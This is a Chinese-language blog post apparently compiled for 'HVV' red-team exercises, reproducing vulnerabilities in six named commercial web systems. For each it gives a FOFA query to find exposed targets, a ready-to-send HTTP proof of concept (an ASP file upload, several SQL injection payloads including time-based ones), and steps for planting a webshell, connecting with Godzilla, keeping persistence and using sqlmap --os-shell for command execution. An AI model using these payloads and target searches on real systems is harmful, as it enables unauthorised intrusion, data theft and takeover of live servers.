首页 > 其他分享 >护网漏洞复现

护网漏洞复现

时间:2024-09-04 09:03:09浏览次数:10  
标签:xxx Accept 漏洞 复现 fofa SQL NULL 护网

金程云OA UploadFile存在任意文件上传漏洞

描述:金程云OA UploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

fofa语法:body="images/yipeoplehover.png"

POC:

POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1

Host: xxx.xxx.xxx.xxx

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR

Content-Length: 191

------WebKitFormBoundaryNe8DcVuv1vEUWDaR

Content-Disposition: form-data; name="upload";filename="123.Asp"

<% response.write("hello,world") %>

------WebKitFormBoundaryNe8DcVuv1vEUWDaR--

漏洞复现:

fofa中搜索资产,共有339条数据匹配

img

以下为登录页面以及页面特征

img

当前页面抓包构造payload

img

文件已上传,访问http://xxx.xxx.xxx.xxx/OA/upfiles/temp/文件名

img

尝试上传一句话木马

img

哥斯拉连接成功

img

由于是存放在temp目录下的,如果不做权限维持的话,过不了多久木马文件见会被删除。

微商城系统goods.php存在SQL注入漏洞

描述:微商城系统goods.php接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息外,甚至在高权限的情况下可向服务器中写入木马,进一步获取服务器系统权限。

fofa语法:body="/Mao_Public/js/jquery-2.1.1.min.js"

POC:

GET /goods.php?id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170706271,0x6e63516a52476c6a6279686672466358565970534b6152786a595456464765644f5550486b674a5a,0x7171717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1

Accept: /

Accept-Encoding: gzip, deflate

Connection: close

漏洞复现:

fofa中搜索资产,共有433条数据匹配

img

访问测试网址,抓包构造payload

img

将url放入到sqlmap中进行测试

img

众诚网上订单系统o_sa_order存在SQL注入漏洞

描述:众诚网上订单系统o_sa_order存在SQL注入漏洞,未经授权的远程攻击者可以利用该漏洞获取数据库中的敏感信息,甚至在高权限的情况下获取数据库服务器系统权限。

fofa语法:title="欢迎使用众诚网上订单系统"

POC:

POST /ajax/o_sa_order.ashx HTTP/1.1

Host: xxx.xxx.xxx.xxx

Connection: keep-alive

Content-Length: 39

sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"

Accept: /

sec-ch-ua-platform: "Windows"

X-Requested-With: XMLHttpRequest

sec-ch-ua-mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: https:// xxx.xxx.xxx.xxx

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://xxx.xxx.xxx.xxx/

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6,ja;q=0.5

Cookie: __session:0.9071926173178362:=https:

type=login&user_id=admin')--+&user_pwd=12345

漏洞复现:

fofa中搜索资产,共有23条数据匹配

img

以下为登录页面以及页面特征

img

随便输入用户名和密码,抓取登录数据包

图形用户界面, 文本, 应用程序  描述已自动生成

用户名和密码是随便输入的,所以会提示用户无效或密码错误

然后在user_id和user_pwd后面输入单引号使得系统报错

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

图形用户界面, 文本, 应用程序  描述已自动生成

发现在user_id处输入单引号会报错,那么注入点可能是在这里,然后就是判断闭合了

经过测试后发现测试payload为:’)--+

img

通过order by可以判断存在19个字段,接下来用sqlmap进行后续测试

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

img

还可以使用--os-shell参数执行命令,但是sqlmap中无法显示输出

img

东胜物流软件OPERATORCODEAdatpter存在SQL注入漏洞

描述:东胜物流软件OPERATORCODEAdatpater接口处存在SQL注入漏洞,攻击者除了可以利用该漏洞获取数据库中敏感信息外,甚至在高权限的情况下向服务器中写入木马,进一步获取服务器系统权限

fofa语法:body="CompanysAdapter.aspx"

POC:http://xxx.xxx.xxx.xxx/FeeCodes/OPERATORCODEAdapter.aspx?SHOWNAME=x&rName=&CUSTOMERNAME=1')--+

注入点在SHOWNAME以及CUSTOMERNAME处

漏洞复现:

fofa中搜索资产,共有1324条数据匹配

img

以下为登陆页面以及页面特征

图形用户界面  中度可信度描述已自动生成

访问http://xxx.xxx.xxx.xxx/FeeCodes/OPERATORCODEAdapter.aspx?SHOWNAME=x&rName=&CUSTOMERNAME=1

返回页面是空白的,单也说明了此接口存在,然后判断注入点以及闭合方式

在SHOWNAME处的闭合方式为:’--+

img

在CUSTOMERNAME=1处的闭合方式为:’)--+

文本  中度可信度描述已自动生成

将url放入sqlmap中进行测试

img

img

还可以用--os-shell远程执行命令

img

通天星CMSV6车载定位监控平台getAlarmAppealByGuid 存在SQL注入漏洞

描述:该漏洞是由于通天星CMSV6车载定位监控平台/alarm_appeal/getAlarmAppealByGuid接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取漏洞获取网站绝对路径写入后门文件进行远程代码执行

fofa语法:body="/808gps/"

POC:

POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8

Accept-Encoding: gzip, deflate

guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(10)))PITq) AND ('qhqF'='qhqF

漏洞复现:

fofa中搜索资产,共有8114条数据匹配

img

访问测试地址,抓取数据包并构造payload

img

img

将数据包放入到sqlmap中进行测试,此次测试需要添加很多的参数,命令如下:

python3 sqlmap.py -r 1.txt --risk 3 --tamper=space2comment --random-agent --time-sec 10

img

同鑫T9eHR信息化管理系统GetFlowDropDownListLtems存在SQL注入漏洞

描述:同鑫T9eHR信息化管理系统的/Common/GetFlowDropDownListItems接口存在SQL注入漏洞,未经身份验证的攻击者可以通过该漏洞获取数据库敏感信息

fofa语法:body="T9eHR"

POC:

POST /Common/GetFlowDropDownListItems HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: /

Connection: close

Content-Type: application/x-www-form-urlencoded; charset=utf-8

Content-Length: 33

FixedFormCode=1'--+

漏洞复现:

fofa中搜索资产,共有587条数据匹配

img

以下为登录页面以及页面特征

图形用户界面, 应用程序  描述已自动生成

当前页面抓包构造payload

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

判断注入点以及闭合方式

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

可以用order by判断处该数据库存在两个字段

img

img

标签:xxx,Accept,漏洞,复现,fofa,SQL,NULL,护网
From: https://www.cnblogs.com/LeouMaster/p/18395784

相关文章

  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • Pikachu文件包含漏洞(本地和远程)
    一、本地文件包含打开靶场,选择一个查看读取一个本地文件查看二、远程文件包含在云服务器创建一个txt文件写入<?phpfputs(fopen("shell.php","w"),'<?phpeval($_POST["cmd"]);?>')?>在本机上查看,会生成一个6.php,使用蚁剑连接查看......
  • 应用程序报错漏洞修复
    漏洞描述错误页面由服务器产生400、403、404、500等错误时,返回详细错误信息。报错信息中可能会包含服务器代码信息、服务器版本信息、模板类型、数据库连接信息、SQL语句或者敏感文件的路径。修复修改nginx配置#其他配置...server{#其他配置...#指定400......
  • 文件包含PHP伪协议利用方法 本地复现
    环境配置步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include步骤二:创建123.php文件输入一句话木马步骤三:创建1.phpless-1 file://协议123.php?cmd=file://D:\phpstudy_pro\WWW\1.phpless-2 php://filter协......
  • pikachu文件包含漏洞靶场
    Fileinclusion(local)创建1.php步骤一:选择一个球员提交../../../../1.phpFileInclusion(remote)(远程文件包含)步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include;步骤二:选择球员步骤三:宝塔公网上创建一个6.txt文......
  • 【SCI复现】基于纳什博弈和ADMM的多微网主体能源共享研究(Matlab代码实现)
    ......
  • 【太阳能学报EI复现】基于粒子群优化算法的风-水电联合优化运行分析(Matlab代码实现)
    ......
  • pikachu文件包含漏洞靶场攻略
    1.Fileinclusion(local)(本地文件包含)步骤一:选择一个球员提交步骤二:filename后面输入../../../../shw.php访问php文件2.FileInclusion(remote)(远程文件包含)步骤一:修改配置远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on//默认打开Allow_url_include=on/......
  • 蜂信物联 FastBee 开源物联网平台 download 任意文件读取漏洞复现
    1产品简介蜂信物联(FastBee)开源物联网平台是一个专为物联网应用设计的综合性平台,它集成了硬件接入、数据管理、应用开发等一系列功能,为用户提供了一个完整、便捷的物联网解决方案。平台以其简单易用、功能强大、高度可扩展和安全性高的特点,为物联网应用的发展提供了有力支持......
  • 2024Hvv漏洞汇总(128个POC)
    2024Hvv漏洞整理(128个POC)​(网上漏洞零零散散)下面是收集到的且有POC的漏洞整理合集,鄙人分了三种格式供各位提取,下面贴上目录与图片,由于字数有点大,各位请移步网盘自行提取。按照Hvv时间线进行汇总每天爆出的漏洞(非最全Hvv漏洞)提前总结:各位道友可移步到我的公众号(公众号同名搜......